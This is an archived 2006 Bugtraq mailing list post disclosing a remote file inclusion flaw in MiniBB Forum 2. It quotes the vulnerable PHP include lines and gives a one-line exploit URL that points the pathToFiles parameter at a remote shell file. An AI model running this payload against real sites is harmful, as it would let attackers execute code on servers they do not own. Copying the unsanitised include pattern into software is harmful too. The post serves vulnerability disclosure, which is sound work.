| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY12-F67939D54F5B82DD493BAAF5F40@phx.gbl>
Date: Mon, 13 Nov 2006 18:15:03 +0000
From: "philip anselmo" <spoonman500@...mail.com>
To: bugtraq@...urityfocus.com
Subject: New Bug MiniBB Forum <= 2 Remote File Include (index.php)
Title : MiniBB Forum <= 2 Remote File Include (index.php)
########################################################################
#######
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}
------------------------------------------------------------------------
Sorce Code:
http://www.minibb.net/download.php?file=minibb20
-----
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : MiniBB Forum 2 (index.php)version :
version [ 2 ]
exploit :Remote File Include
------------------------------------------------------------------------
-----
Vulnerable Code:
include ($pathToFiles.'setup_'.$DB.'.php');
include ($pathToFiles.'bb_cookie.php');
include ($pathToFiles.'bb_functions.php');
include ($pathToFiles.'bb_specials.php');
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/index.php?pathToFiles=Shell.txt?
------------------------------------------------------------------------
----
greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco
Special Greeting:AsbMay's Group
channel:www.asb-may.net
contact:spoonman500[at]hotmail[dot]com
_________________________________________________________________
MSN Hotmail sur i-mode : envoyez et recevez des e-mails depuis votre
téléphone portable ! http://www.msn.fr/hotmailimode/
Powered by blists - more mailing lists